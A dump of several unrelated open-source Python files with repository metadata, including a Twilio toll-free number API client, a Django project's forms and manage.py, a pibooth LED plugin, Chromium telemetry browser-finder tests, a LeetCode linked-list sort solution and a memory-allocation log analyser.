:returns: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeList
:rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeList
"""
super(TollFreeList, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, }
self._uri = '/Accounts/{account_sid}/IncomingPhoneNumbers/TollFree.json'.format(**self._solution)
def stream(self, beta=values.unset, friendly_name=values.unset,
phone_number=values.unset, origin=values.unset, limit=None,
page_size=None):
"""
Streams TollFreeInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param bool beta: Whether to include new phone numbers
:param unicode friendly_name: A string that identifies the resources to read
:param unicode phone_number: The phone numbers of the resources to read
:param unicode origin: Include phone numbers based on their origin. By default, phone numbers of all origin are included.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
beta=beta,
friendly_name=friendly_name,
phone_number=phone_number,
origin=origin,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, beta=values.unset, friendly_name=values.unset,
phone_number=values.unset, origin=values.unset, limit=None,
page_size=None):
"""
Lists TollFreeInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param bool beta: Whether to include new phone numbers
:param unicode friendly_name: A string that identifies the resources to read
:param unicode phone_number: The phone numbers of the resources to read
:param unicode origin: Include phone numbers based on their origin. By default, phone numbers of all origin are included.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance]
"""
return list(self.stream(
beta=beta,
friendly_name=friendly_name,
phone_number=phone_number,
origin=origin,
limit=limit,
page_size=page_size,
))
def page(self, beta=values.unset, friendly_name=values.unset,
phone_number=values.unset, origin=values.unset,
page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of TollFreeInstance records from the API.
Request is executed immediately
:param bool beta: Whether to include new phone numbers
:param unicode friendly_name: A string that identifies the resources to read
:param unicode phone_number: The phone numbers of the resources to read
:param unicode origin: Include phone numbers based on their origin. By default, phone numbers of all origin are included.
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of TollFreeInstance
:rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreePage
"""
params = values.of({
'Beta': beta,
'FriendlyName': friendly_name,
'PhoneNumber': phone_number,
'Origin': origin,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return TollFreePage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of TollFreeInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of TollFreeInstance
:rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreePage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return TollFreePage(self._version, response, self._solution)
def create(self, phone_number, api_version=values.unset,
friendly_name=values.unset, sms_application_sid=values.unset,
sms_fallback_method=values.unset, sms_fallback_url=values.unset,
sms_method=values.unset, sms_url=values.unset,
status_callback=values.unset, status_callback_method=values.unset,
voice_application_sid=values.unset,
voice_caller_id_lookup=values.unset,
voice_fallback_method=values.unset, voice_fallback_url=values.unset,
voice_method=values.unset, voice_url=values.unset,
identity_sid=values.unset, address_sid=values.unset):
"""
Create a new TollFreeInstance
:param unicode phone_number: The phone number to purchase in E.164 format
:param unicode api_version: The API version to use for incoming calls made to the new phone number
:param unicode friendly_name: A string to describe the new phone number
:param unicode sms_application_sid: The SID of the application to handle SMS messages
:param unicode sms_fallback_method: HTTP method used with sms_fallback_url
:param unicode sms_fallback_url: The URL we call when an error occurs while executing TwiML
:param unicode sms_method: The HTTP method to use with sms_url
:param unicode sms_url: The URL we should call when the new phone number receives an incoming SMS message
:param unicode status_callback: The URL to send status information to your application
:param unicode status_callback_method: The HTTP method we should use to call status_callback
:param unicode voice_application_sid: The SID of the application to handle the new phone number
:param bool voice_caller_id_lookup: Whether to lookup the caller's name
:param unicode voice_fallback_method: The HTTP method used with voice_fallback_url
:param unicode voice_fallback_url: The URL we will call when an error occurs in TwiML
:param unicode voice_method: The HTTP method used with the voice_url
:param unicode voice_url: The URL we should call when the phone number receives a call
:param unicode identity_sid: The SID of the Identity resource to associate with the new phone number
:param unicode address_sid: The SID of the Address resource associated with the phone number
:returns: Newly created TollFreeInstance
:rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
"""
data = values.of({
'PhoneNumber': phone_number,
'ApiVersion': api_version,
'FriendlyName': friendly_name,
'SmsApplicationSid': sms_application_sid,
'SmsFallbackMethod': sms_fallback_method,
'SmsFallbackUrl': sms_fallback_url,
'SmsMethod': sms_method,
'SmsUrl': sms_url,
'StatusCallback': status_callback,
'StatusCallbackMethod': status_callback_method,
'VoiceApplicationSid': voice_application_sid,
'VoiceCallerIdLookup': voice_caller_id_lookup,
'VoiceFallbackMethod': voice_fallback_method,
'VoiceFallbackUrl': voice_fallback_url,
'VoiceMethod': voice_method,
'VoiceUrl': voice_url,
'IdentitySid': identity_sid,
'AddressSid': address_sid,
})
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return TollFreeInstance(self._version, payload, account_sid=self._solution['account_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.TollFreeList>'
class TollFreePage(Page):
""" """
def __init__(self, version, response, solution):
"""
Initialize the TollFreePage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: The SID of the Account that created the resource
:returns: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreePage
:rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreePage
"""
super(TollFreePage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of TollFreeInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
:rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
"""
return TollFreeInstance(self._version, payload, account_sid=self._solution['account_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.TollFreePage>'
class TollFreeInstance(InstanceResource):
""" """
class AddressRequirement(object):
NONE = "none"
ANY = "any"
LOCAL = "local"
FOREIGN = "foreign"
def __init__(self, version, payload, account_sid):
"""
Initialize the TollFreeInstance
:returns: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
:rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
"""
super(TollFreeInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload.get('account_sid'),
'address_sid': payload.get('address_sid'),
'address_requirements': payload.get('address_requirements'),
'api_version': payload.get('api_version'),
'beta': payload.get('beta'),
'capabilities': payload.get('capabilities'),
'date_created': deserialize.rfc2822_datetime(payload.get('date_created')),
'date_updated': deserialize.rfc2822_datetime(payload.get('date_updated')),
'friendly_name': payload.get('friendly_name'),
'identity_sid': payload.get('identity_sid'),
'phone_number': payload.get('phone_number'),
'origin': payload.get('origin'),
'sid': payload.get('sid'),
'sms_application_sid': payload.get('sms_application_sid'),
'sms_fallback_method': payload.get('sms_fallback_method'),
'sms_fallback_url': payload.get('sms_fallback_url'),
'sms_method': payload.get('sms_method'),
'sms_url': payload.get('sms_url'),
'status_callback': payload.get('status_callback'),
'status_callback_method': payload.get('status_callback_method'),
'trunk_sid': payload.get('trunk_sid'),
'uri': payload.get('uri'),
'voice_application_sid': payload.get('voice_application_sid'),
'voice_caller_id_lookup': payload.get('voice_caller_id_lookup'),
'voice_fallback_method': payload.get('voice_fallback_method'),
'voice_fallback_url': payload.get('voice_fallback_url'),
'voice_method': payload.get('voice_method'),
'voice_url': payload.get('voice_url'),
}
# Context
self._context = None
self._solution = {'account_sid': account_sid, }
@property
def account_sid(self):
"""
:returns: The SID of the Account that created the resource
:rtype: unicode
"""
return self._properties['account_sid']
@property
def address_sid(self):
"""
:returns: The SID of the Address resource associated with the phone number
:rtype: unicode
"""
return self._properties['address_sid']
@property
def address_requirements(self):
"""
:returns: Whether the phone number requires an Address registered with Twilio.
:rtype: TollFreeInstance.AddressRequirement
"""
return self._properties['address_requirements']
@property
def api_version(self):
"""
:returns: The API version used to start a new TwiML session
:rtype: unicode
"""
return self._properties['api_version']
@property
def beta(self):
"""
:returns: Whether the phone number is new to the Twilio platform
:rtype: bool
"""
return self._properties['beta']
@property
def capabilities(self):
"""
:returns: Indicate if a phone can receive calls or messages
:rtype: unicode
"""
return self._properties['capabilities']
@property
def date_created(self):
"""
:returns: The RFC 2822 date and time in GMT that the resource was created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The RFC 2822 date and time in GMT that the resource was last updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def friendly_name(self):
"""
:returns: The string that you assigned to describe the resource
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def identity_sid(self):
"""
:returns: The SID of the Identity resource associated with number
:rtype: unicode
"""
return self._properties['identity_sid']
@property
def phone_number(self):
"""
:returns: The phone number in E.164 format
:rtype: unicode
"""
return self._properties['phone_number']
@property
def origin(self):
"""
:returns: The phone number's origin. Can be twilio or hosted.
:rtype: unicode
"""
return self._properties['origin']
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def sms_application_sid(self):
"""
:returns: The SID of the application that handles SMS messages sent to the phone number
:rtype: unicode
"""
return self._properties['sms_application_sid']
@property
def sms_fallback_method(self):
"""
:returns: The HTTP method used with sms_fallback_url
:rtype: unicode
"""
return self._properties['sms_fallback_method']
@property
def sms_fallback_url(self):
"""
:returns: The URL that we call when an error occurs while retrieving or executing the TwiML
:rtype: unicode
"""
return self._properties['sms_fallback_url']
@property
def sms_method(self):
"""
:returns: The HTTP method to use with sms_url
:rtype: unicode
"""
return self._properties['sms_method']
@property
def sms_url(self):
"""
:returns: The URL we call when the phone number receives an incoming SMS message
:rtype: unicode
"""
return self._properties['sms_url']
@property
def status_callback(self):
"""
:returns: The URL to send status information to your application
:rtype: unicode
"""
return self._properties['status_callback']
@property
def status_callback_method(self):
"""
:returns: The HTTP method we use to call status_callback
:rtype: unicode
"""
return self._properties['status_callback_method']
@property
def trunk_sid(self):
"""
:returns: The SID of the Trunk that handles calls to the phone number
:rtype: unicode
"""
return self._properties['trunk_sid']
@property
def uri(self):
"""
:returns: The URI of the resource, relative to `https://api.twilio.com`
:rtype: unicode
"""
return self._properties['uri']
@property
def voice_application_sid(self):
"""
:returns: The SID of the application that handles calls to the phone number
:rtype: unicode
"""
return self._properties['voice_application_sid']
@property
def voice_caller_id_lookup(self):
"""
:returns: Whether to lookup the caller's name
:rtype: bool
"""
return self._properties['voice_caller_id_lookup']
@property
def voice_fallback_method(self):
"""
:returns: The HTTP method used with voice_fallback_url
:rtype: unicode
"""
return self._properties['voice_fallback_method']
@property
def voice_fallback_url(self):
"""
:returns: The URL we call when an error occurs in TwiML
:rtype: unicode
"""
return self._properties['voice_fallback_url']
@property
def voice_method(self):
"""
:returns: The HTTP method used with the voice_url
:rtype: unicode
"""
return self._properties['voice_method']
@property
def voice_url(self):
"""
:returns: The URL we call when the phone number receives a call
:rtype: unicode
"""
return self._properties['voice_url']
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.TollFreeInstance>'
|
tysonholub/twilio-python
|
twilio/rest/api/v2010/account/incoming_phone_number/toll_free.py
|
Python
|
mit
| 20,610
|
#
# Transmission Line Simulator
#
# Author(s): Jiacong Xu
# Created: Jul-27-2017
#
from util.constants import *
from circuitelement import CircuitElement
import numpy as np
class Wire(CircuitElement):
"""
Represents a wire. This class allows an arbitrary signal speed and relays
voltage accordingly.
"""
def __init__(self, ohm, speed):
"""
Initializes this wire with given ohm value and speed.
ohm: impedence in ohms.
speed: speed of wave propagation in c.
"""
super(Wire, self).__init__()
self.impedance = ohm
self.speed = speed
def split(self):
# Splitting forward
amp = self.forward[-1]
r = self.next.impedance
z = self.impedance
if r + z == 0:
reflCoefficient = 0
else:
reflCoefficient = (r - z) / (r + z)
self.forward[-1] -= reflCoefficient * amp
self.backward[-1] += reflCoefficient * amp
# Splitting backward
amp = self.backward[0]
r = self.prev.impedance
z = self.impedance
if r + z == 0:
reflCoefficient = 0
else:
reflCoefficient = (r - z) / (r + z)
self.backward[0] -= reflCoefficient * amp
self.forward[0] += reflCoefficient * amp
def rotateForward(self):
self.forward = np.roll(self.forward, 1)
self.forward[0] = self.prev.forward[-1]
def rotateBackward(self):
self.backward = np.roll(self.backward, -1)
self.backward[-1] = self.next.backward[0]
|
flyingbanana1024102/transmission-line-simulator
|
src/models/wire.py
|
Python
|
mit
| 1,615
|
__source__ = 'https://leetcode.com/problems/sort-list/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/sort-list.py
# Time: O(nlogn)
# Space: O(logn) for stack call
# Sort
#
# Description: Leetcode # 148. Sort List
#
# Sort a linked list in O(n log n) time using constant space complexity.
#
# Related Topics
# Linked List Sort
# Similar Questions
# Merge Two Sorted Lists Sort Colors Insertion Sort List
#
import unittest
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __repr__(self):
if self:
return "{} -> {}".format(self.val, repr(self.next))
class Solution:
# @param head, a ListNode
# @return a ListNode
def sortList(self, head):
if head == None or head.next == None:
return head
fast,slow, prev = head , head, None
while fast != None and fast.next != None:
prev, slow, fast = slow, slow.next, fast.next.next
prev.next = None
sorted_l1 = self.sortList(slow)
sorted_l2 = self.sortList(head)
return self.mergeTwoLists(sorted_l1, sorted_l2)
def mergeTwoLists(self, l1, l2):
dummy = ListNode(0)
cur = dummy
while l1 != None and l2 != None:
if l1.val <= l2.val:
cur.next = l1
cur, l1 = l1, l1.next # cannot decalre cur = cur.next, None obj exception
else:
cur.next = l2
cur, l2 = l2, l2.next
if l1 != None:
cur.next = l1
if l2 != None:
cur.next = l2
return dummy.next
# Definition for singly-linked list.
# http://www.cnblogs.com/zuoyuan/p/3699508.html
# http://jelices.blogspot.com/2014/06/leetcode-python-sort-list.html this one implement using merge sort
class SolutionOther:
# @param head, a ListNode
# @return a ListNode
def sortList(self, head):
if head == None or head.next == None:
return head
slow = head
fast = head
while fast.next and fast.next.next:
slow = slow.next
fast = fast.next.next
head1 = head
head2 = slow.next
slow.next = None
head1 = self.sortList(head1)
head2 = self.sortList(head2)
head = self.merge(head1, head2)
return head
def merge(self, head1, head2):
if head1 == None:
return head2
if head2 == None:
return head1
dummy = ListNode(0)
p = dummy
while head1 and head2:
if head1.val < head2.val:
p.next = head1
head1 = head1.next
p = p.next
else:
p.next = head2
head2 = head2.next
p = p.next
if head1 == None:
p.next = head2
if head2 == None:
p.next = head1
return dummy.next
#List
c1 = ListNode(5)
c2 = ListNode(1)
c3 = ListNode(9)
a1 = ListNode(1)
a2 = ListNode(2)
a3 = ListNode(3)
a4 = ListNode(4)
c1.next = c2
c2.next = c3
c3.next = None
a1.next = a2
a2.next = a3
a3.next = a4
b1= ListNode(1)
#test
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
head = ListNode(3)
head.next = ListNode(4)
head.next.next = ListNode(1)
head.next.next.next= ListNode(2)
print Solution().sortList(head)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
# 7ms 33.52%
class Solution {
public ListNode sortList(ListNode head) {
if (head == null) return head;
if (head.next == null) return head;
//p1 move 1 step every time, p2 move 2 step every time, pre record node before p1
ListNode p1 = head;
ListNode p2 = head;
ListNode pre = head;
while(p2 != null && p2.next != null) {
pre = p1;
p1 = p1.next;
p2 = p2.next.next;
}
//change pre next to null, make two sub list(head to pre, p1 to p2)
pre.next = null;
ListNode h1 = sortList(head);
ListNode h2 = sortList(p1);
return merge(h1, h2);
}
public ListNode merge(ListNode h1, ListNode h2) {
if (h1 == null) return h2;
if (h2 == null) return h1;
if (h1.val < h2.val) {
h1.next = merge(h1.next, h2);
return h1;
}else {
h2.next = merge(h1, h2.next);
return h2;
}
}
}
# Different thinking, similar technique
# 5ms 69.10%
class Solution {
public ListNode sortList(ListNode head) {
if (head == null || head.next == null) return head;
int length = 1;
ListNode cur = head;
while(cur != null) {
length++;
cur = cur.next;
}
int mid = length/2;
cur = head;
while(mid > 1) {
cur = cur.next;
mid--;
}
ListNode newHead = cur.next;
cur.next = null;
ListNode h1 = sortList(head);
ListNode h2 = sortList(newHead);
return merge(h1, h2);
}
public ListNode merge(ListNode h1, ListNode h2) {
if (h1 == null) return h2;
if (h2 == null) return h1;
ListNode head;
if (h1.val < h2.val) {
head = h1;
head.next = merge(h1.next, h2);
}else {
head = h2;
head.next = merge(h1, h2.next); //order should not mater with head pointer, but get stack overflow somehow
}
return head;
}
}
# 4ms 94.54%
class Solution {
public ListNode sortList(ListNode head) {
if (head == null || head.next == null) {
return head;
}
ListNode slow = head;
ListNode fast = head;
while (fast.next != null && fast.next.next != null) {
slow = slow.next;
fast = fast.next.next;
}
ListNode secondHalf = slow.next;
slow.next = null;
ListNode firstHalf = sortList(head);
secondHalf = sortList(secondHalf);
return merge(firstHalf, secondHalf);
}
private ListNode merge(ListNode first, ListNode second) {
ListNode result = new ListNode(0);
ListNode prev = result;
while (first != null && second != null) {
if (first.val < second.val) {
prev.next = first;
prev = prev.next;
first = first.next;
} else {
prev.next = second;
prev = prev.next;
second = second.next;
}
}
while (first != null) {
prev.next = first;
prev = prev.next;
first = first.next;
}
while (second != null) {
prev.next = second;
prev = prev.next;
second = second.next;
}
return result.next;
}
}
'''
|
JulyKikuAkita/PythonPrac
|
cs15211/SortList.py
|
Python
|
apache-2.0
| 6,949
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tenacious.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
vzvenyach/tenacious
|
tenacious/manage.py
|
Python
|
mit
| 252
|
from django import forms
from accounts.models import User, Review, Comment
from django.contrib.auth.forms import UserCreationForm
from django.forms import ModelForm
class UserCreationForm(UserCreationForm):
email = forms.EmailField(required=True)
avatar = forms.ImageField(required=False)
class Meta:
model = User
fields = ("username", "email", "avatar", "password1", "password2",)
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
user.email = self.cleaned_data["email"]
user.avatar = self.cleaned_data["avatar"]
if commit:
user.save()
return user
class EditUserForm(ModelForm):
class Meta:
model = User
fields = ("website", "bio", "avatar")
class ReviewForm(ModelForm):
class Meta:
model = Review
exclude = ("book", "user")
class CommentForm(ModelForm):
class Meta:
model = Comment
exclude = ("review", "user")
|
ch3ka/codingcontest2012
|
bookz/accounts/forms.py
|
Python
|
gpl-3.0
| 1,001
|
# -*- coding: utf-8 -*-
import time
import pibooth
class LightsPlugin(object):
"""Plugin to manage the lights via GPIO.
"""
def __init__(self, plugin_manager):
self._pm = plugin_manager
@pibooth.hookimpl
def pibooth_startup(self, app):
app.led_startup.switch_on()
@pibooth.hookimpl
def pibooth_cleanup(self, app):
app.led_startup.quit()
app.led_preview.quit()
app.led_capture.quit()
app.led_print.quit()
@pibooth.hookimpl
def state_wait_enter(self, app):
app.led_capture.blink()
if app.previous_picture_file and app.printer.is_installed() and not app.printer_unavailable:
app.led_print.blink()
@pibooth.hookimpl
def state_wait_do(self, cfg, app, events):
if app.find_print_event(events) and app.previous_picture_file and app.printer.is_installed():
app.led_print.switch_on()
time.sleep(1) # Just to let the LED switched on
if app.nbr_duplicates >= cfg.getint('PRINTER', 'max_duplicates') or app.printer_unavailable:
app.led_print.switch_off()
else:
app.led_print.blink()
@pibooth.hookimpl
def state_wait_exit(self, app):
app.led_capture.switch_off()
app.led_print.switch_off()
@pibooth.hookimpl
def state_choose_enter(self, app):
app.led_capture.blink()
app.led_print.blink()
@pibooth.hookimpl
def state_choose_exit(self, app):
if app.capture_nbr == app.capture_choices[0]:
app.led_capture.switch_on()
app.led_print.switch_off()
elif app.capture_nbr == app.capture_choices[1]:
app.led_print.switch_on()
app.led_capture.switch_off()
@pibooth.hookimpl
def state_chosen_exit(self, app):
app.led_capture.switch_off()
app.led_print.switch_off()
@pibooth.hookimpl
def state_preview_enter(self, app):
app.led_preview.switch_on()
@pibooth.hookimpl
def state_capture_exit(self, app):
app.led_preview.switch_off()
@pibooth.hookimpl
def state_print_enter(self, app):
app.led_print.blink()
@pibooth.hookimpl
def state_print_do(self, app, events):
if app.find_print_event(events) and app.previous_picture_file:
app.led_print.switch_on()
@pibooth.hookimpl
def state_print_exit(self, app):
if app.previous_picture_file:
app.led_print.blink()
|
werdeil/pibooth
|
pibooth/plugins/lights_plugin.py
|
Python
|
mit
| 2,503
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.core import browser_options
from telemetry.core.backends.chrome import desktop_browser_finder
from telemetry.unittest import system_stub
# This file verifies the logic for finding a browser instance on all platforms
# at once. It does so by providing stubs for the OS/sys/subprocess primitives
# that the underlying finding logic usually uses to locate a suitable browser.
# We prefer this approach to having to run the same test on every platform on
# which we want this code to work.
class FindTestBase(unittest.TestCase):
def setUp(self):
self._finder_options = browser_options.BrowserFinderOptions()
self._finder_options.chrome_root = '../../../'
self._stubs = system_stub.Override(desktop_browser_finder,
['os', 'subprocess', 'sys'])
def tearDown(self):
self._stubs.Restore()
@property
def _files(self):
return self._stubs.os.path.files
def DoFindAll(self):
return desktop_browser_finder.FindAllAvailableBrowsers(self._finder_options)
def DoFindAllTypes(self):
browsers = self.DoFindAll()
return [b.browser_type for b in browsers]
def CanFindAvailableBrowsers(self):
return desktop_browser_finder.CanFindAvailableBrowsers()
def has_type(array, browser_type):
return len([x for x in array if x.browser_type == browser_type]) != 0
class FindSystemTest(FindTestBase):
def setUp(self):
super(FindSystemTest, self).setUp()
self._stubs.sys.platform = 'win32'
def testFindProgramFiles(self):
if not self.CanFindAvailableBrowsers():
return
self._files.append(
'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe')
self._stubs.os.program_files = 'C:\\Program Files'
self.assertTrue('system' in self.DoFindAllTypes())
def testFindProgramFilesX86(self):
if not self.CanFindAvailableBrowsers():
return
self._files.append(
'C:\\Program Files(x86)\\Google\\Chrome\\Application\\chrome.exe')
self._stubs.os.program_files_x86 = 'C:\\Program Files(x86)'
self.assertTrue('system' in self.DoFindAllTypes())
def testFindLocalAppData(self):
if not self.CanFindAvailableBrowsers():
return
self._files.append(
'C:\\Local App Data\\Google\\Chrome\\Application\\chrome.exe')
self._stubs.os.local_app_data = 'C:\\Local App Data'
self.assertTrue('system' in self.DoFindAllTypes())
class FindLocalBuildsTest(FindTestBase):
def setUp(self):
super(FindLocalBuildsTest, self).setUp()
self._stubs.sys.platform = 'win32'
def testFindBuild(self):
if not self.CanFindAvailableBrowsers():
return
self._files.append('..\\..\\..\\build\\Release\\chrome.exe')
self.assertTrue('release' in self.DoFindAllTypes())
def testFindOut(self):
if not self.CanFindAvailableBrowsers():
return
self._files.append('..\\..\\..\\out\\Release\\chrome.exe')
self.assertTrue('release' in self.DoFindAllTypes())
def testFindXcodebuild(self):
if not self.CanFindAvailableBrowsers():
return
self._files.append('..\\..\\..\\xcodebuild\\Release\\chrome.exe')
self.assertTrue('release' in self.DoFindAllTypes())
class OSXFindTest(FindTestBase):
def setUp(self):
super(OSXFindTest, self).setUp()
self._stubs.sys.platform = 'darwin'
self._files.append('/Applications/Google Chrome Canary.app/'
'Contents/MacOS/Google Chrome Canary')
self._files.append('/Applications/Google Chrome.app/' +
'Contents/MacOS/Google Chrome')
self._files.append(
'../../../out/Release/Chromium.app/Contents/MacOS/Chromium')
self._files.append(
'../../../out/Debug/Chromium.app/Contents/MacOS/Chromium')
self._files.append(
'../../../out/Release/Content Shell.app/Contents/MacOS/Content Shell')
self._files.append(
'../../../out/Debug/Content Shell.app/Contents/MacOS/Content Shell')
def testFindAll(self):
if not self.CanFindAvailableBrowsers():
return
types = self.DoFindAllTypes()
self.assertEquals(
set(types),
set(['debug', 'release',
'content-shell-debug', 'content-shell-release',
'canary', 'system']))
class LinuxFindTest(FindTestBase):
def setUp(self):
super(LinuxFindTest, self).setUp()
self._stubs.sys.platform = 'linux2'
self._files.append('/foo/chrome')
self._files.append('../../../out/Release/chrome')
self._files.append('../../../out/Debug/chrome')
self._files.append('../../../out/Release/content_shell')
self._files.append('../../../out/Debug/content_shell')
self.has_google_chrome_on_path = False
this = self
def call_hook(*args, **kwargs): # pylint: disable=W0613
if this.has_google_chrome_on_path:
return 0
raise OSError('Not found')
self._stubs.subprocess.call = call_hook
def testFindAllWithExact(self):
if not self.CanFindAvailableBrowsers():
return
types = self.DoFindAllTypes()
self.assertEquals(
set(types),
set(['debug', 'release',
'content-shell-debug', 'content-shell-release']))
def testFindWithProvidedExecutable(self):
if not self.CanFindAvailableBrowsers():
return
self._finder_options.browser_executable = '/foo/chrome'
self.assertTrue('exact' in self.DoFindAllTypes())
def testFindUsingDefaults(self):
if not self.CanFindAvailableBrowsers():
return
self.has_google_chrome_on_path = True
self.assertTrue('release' in self.DoFindAllTypes())
del self._files[1]
self.has_google_chrome_on_path = True
self.assertTrue('system' in self.DoFindAllTypes())
self.has_google_chrome_on_path = False
del self._files[1]
self.assertEquals(['content-shell-debug', 'content-shell-release'],
self.DoFindAllTypes())
def testFindUsingRelease(self):
if not self.CanFindAvailableBrowsers():
return
self.assertTrue('release' in self.DoFindAllTypes())
class WinFindTest(FindTestBase):
def setUp(self):
super(WinFindTest, self).setUp()
self._stubs.sys.platform = 'win32'
self._stubs.os.local_app_data = 'c:\\Users\\Someone\\AppData\\Local'
self._files.append('c:\\tmp\\chrome.exe')
self._files.append('..\\..\\..\\build\\Release\\chrome.exe')
self._files.append('..\\..\\..\\build\\Debug\\chrome.exe')
self._files.append('..\\..\\..\\build\\Release\\content_shell.exe')
self._files.append('..\\..\\..\\build\\Debug\\content_shell.exe')
self._files.append(self._stubs.os.local_app_data + '\\' +
'Google\\Chrome\\Application\\chrome.exe')
self._files.append(self._stubs.os.local_app_data + '\\' +
'Google\\Chrome SxS\\Application\\chrome.exe')
def testFindAllGivenDefaults(self):
if not self.CanFindAvailableBrowsers():
return
types = self.DoFindAllTypes()
self.assertEquals(set(types),
set(['debug', 'release',
'content-shell-debug', 'content-shell-release',
'system', 'canary']))
def testFindAllWithExact(self):
if not self.CanFindAvailableBrowsers():
return
self._finder_options.browser_executable = 'c:\\tmp\\chrome.exe'
types = self.DoFindAllTypes()
self.assertEquals(
set(types),
set(['exact',
'debug', 'release',
'content-shell-debug', 'content-shell-release',
'system', 'canary']))
|
boundarydevices/android_external_chromium_org
|
tools/telemetry/telemetry/core/backends/chrome/desktop_browser_finder_unittest.py
|
Python
|
bsd-3-clause
| 7,672
|
from __future__ import print_function
import numpy as np
#1) Run dev-tools/mem_counter inside EPW/src
#2) compile UtilXlib/mem_counter.f90 with -D__DEBUG flag
#3) Run EPW
#4) grep ' allocating' epw1.out > alloc.txt
#5) grep 'deallocating' epw1.out > dealloc.txt
#6) Run this script after having changed the correct allocation lengths
alloc_len = 38817
dealloc_len = 38769
ii = 0
alloc_name = [None] * alloc_len
alloc_size = np.zeros((alloc_len))
alloc_sub = [None] * alloc_len
with open('alloc.txt','r') as R:
for lines in R:
tmp = lines.split()
alloc_name[ii] = str(tmp[4])
alloc_sub[ii] = str(tmp[5])
alloc_size[ii] = np.float(tmp[1])
ii+=1
ii = 0
dealloc_name = [None] * dealloc_len
dealloc_size = np.zeros((dealloc_len))
with open('dealloc.txt','r') as R:
for lines in R:
tmp = lines.split()
dealloc_name[ii] = str(tmp[4])
dealloc_size[ii] = np.float(tmp[1])
ii+=1
deall_found = [ False ] * dealloc_len
for ii in np.arange(alloc_len):
print(ii, ' / ', alloc_len)
name = alloc_name[ii]
found = False
for jj in np.arange(dealloc_len):
if name == dealloc_name[jj]:
if alloc_size[ii] == dealloc_size[jj] and not deall_found[jj]:
# We found the corresponding all/deall pair
deall_found[jj] = True
found = True
break
if not found:
with open('mem_analyse.out','a') as O:
O.write('We did not find a maching pair in '+str(alloc_sub[ii])+'\n')
O.write('Allocate: '+str(name)+' '+str(alloc_size[ii])+'\n')
O.write('Deallocate: '+str(dealloc_name[jj])+' '+str(dealloc_size[jj])+ '\n')
# print 'We did not find a maching pair in ', alloc_sub[ii]
# print 'Allocate: ',name,' ',alloc_size[ii]
# print 'Deallocate: ',dealloc_name[jj],' ',dealloc_size[jj]
|
QEF/q-e_schrodinger
|
dev-tools/mem_analyse.py
|
Python
|
gpl-2.0
| 1,780
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import re
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError
from odoo.tools.float_utils import float_split_str
